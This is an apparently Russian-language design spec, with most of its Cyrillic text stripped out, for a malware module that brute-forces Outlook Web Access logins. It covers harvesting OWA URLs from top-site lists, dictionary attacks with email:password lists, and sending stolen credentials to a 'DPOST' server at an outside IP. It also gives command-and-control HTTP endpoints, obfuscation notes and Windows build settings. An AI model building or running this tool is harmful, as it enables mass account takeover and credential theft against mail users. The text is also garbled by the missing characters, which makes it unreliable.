       OUTLOOK WEB ACCESS (OWA)

  -     OWA

*  () ,       .


 

        :
-  :  
-  
-   DPOST

    :
- 
- 

  url  .
  .

  :     -50000   .
       -    .   .
s3.amazonaws.com/alexa-static/top-1m.csv.zip
, https://www.quantcast.com/top-sites/US/3

()  :      ,   .

, :
1.      
2.    /owa
3.    mail.domain.com/owa
4.    webmail.domain.com/owa
5.  owa      , goto 1
7.    :  
8.  HTTP-    owa.
9.   , goto 7
10.  ,       ,   url||




0.   - owa.

 ,    (   ):
1. -     .
     .
   :
*     ,   url    ( ).
  ( )   url     (   ).

          .
     ,      .
 ,      ,           .
     ,    .
-         
-     connect()   TCP-.  ,   
   ,     .   ,   .
       ,        
(    ).

2.         (      )

3.    User-Agent.      ,
   .

4.  ,      .  ,  ,    ,
   GET / HTTP/1.1

5.          (      ),
         .
       "   DPOST.txt"

6. ()     ,     .
URL       " ".

7.         (. modules_HOWTO.txt)

8.       owa:
- "Version build %DATE% %TIME%" (   )
- "OWA passwords sent to DPOST server"     
- "OWA passwords send failure: servers unavailable"     DPOST
- "No OWA passwords in range; trying dictionaries",      ,   ,     
- "No OWA passwords; give up",     ,    .
  ,     WantRelease ( "module_HOWTO")    

9.       C++ STL (std::string, ).
     std::mutex    -      
     WinAPI (CRITICAL_SECTION ).

10.    Andrivet (, . _STR())

11.     GetApi.h.  ,     .

12.      - x32-  x64-.

13.         ,    .

14.     .      c:/temp/owa.log (     ).

15.       config.h ( ,   -     - , -   ).

16.        Windows.
       Windows - Windows XP (  - Windows Vista).

17.        Microsoft Visual Studio   2015.

18.  Visual Studio     :
*    :
-  : $(SolutionDir)Bin\$(PlatformTarget)\$(Configuration)\
-  : $(SolutionDir)\obj\$(Platform)\$(Configuration)\$(ProjectName)\
-  : 
*  Release:
-    (/++  ): 
-    (/): 




  -   Ctl  Control,   -   CtlArg (. modules_HOWTO.txt)
    ;         .
       ( ASCII).
XML- .

* settings
     xml   :
<owa>
<delay>   ,  </delay>
<threads>  </threads>
<nurl> url,    ()</nurl>
<ua>user agent</ua>
()<dict1>URL   1</dict1>
()<dict2>URL   2</dict2>
()<dict3>URL   3</dict3>
...
<dictN>URL   N</dictN>
</owa>

     .    ,    .

* dpost 
     xml   :

<dpost>
<handler>http://11.22.33.44:8082</handler>
<handler>127.0.0.1:8083</handler>
</dpost>

 http/https   .   ,     .
   :
-    ,      (HTTP),   ,     SSL/TLS (HTTPS).

   ,        DPOST.

 :  ;   - \r\n,   -  '|' ( ).
 :

  url|user|password\r\n

* pw
  " " "".
   gzip.
  username|password\r\n

() * sites

      ,   -  \r\n
  -   .      http(s)://,    .
  ,  -    .

() * dict

      ,   -  \r\n
  -  |.   -  '|' ( ).

() * ignore

      ,   -  \r\n
  - URL.
    -  gmail.
       .       ,
      email-.


 

   :
-   
-    


 

       ,      .
,   :
-      Alexa,      email   email:password
-   URL OWA  ( url'  webmail.domain.com/owa)
-    (,   URL OWA  )      email:password
-   mode=check|brute,  check -  , brute -     (  ).
     ..

   

           .
      -     ,
    ,    ,
    .

     ,        ,
   .

   ,      .
   srv,     ,
 \r\n  \n,   :.
  ,    HTTP,   - HTTPS.
    (http/https),      .
     ,     ,   .

    HTTP-  

GET /<group>/<clientid>/owa/mode HTTP/1.1
 group  clientid -   struct ParentInfo
 CHAR ParentID[256];
 CHAR ParentGroup[64];
(. module_HOWTO)

  HTTP-    brute  check.
    -       
 5 ;        .

      HTTP-  

  :
GET /<group>/<clientid>/owa/th HTTP/1.1

  -  .
 atoi() == 0,      = std::thread_concurrency() - 1.

GET /<group>/<clientid>/owa/domains HTTP/1.1
 :
1[\r]\n
2[\r]\n
...
(   )

           :

GET /<group>/<clientid>/owa/over HTTP/1.1

  -  ,    /domains -     .
   ( ,   )      ( )
        10  ( -  ).

    HTTP-   :
GET /<group>/<clientid>/owa/dict HTTP/1.1

       text/plain,  application/gzip (    Content-Type)
   gzip,         ,    .
:
email:password[\r]\n


    DPOST (. "   DPOST"   ) 

 POST /<group>/<clientid>/owa/81 HTTP/1.1

     multipart/form-data   source  data.
  source - "OWA Passwords"
  data:  ,   \r\n
 :

owa|url|<username>|<password>\r\n
...
(   )

         HTTP-
GET /<group>/<clientid>/owa/freq HTTP/1.1

      -   ,      .
  0 -      .
    -          X ,
    .

           :

GET /<group>/<clientid>/owa/over HTTP/1.1

  -  ,    /domains -     .
   ( ,   )      ( )
        10  ( -  ).
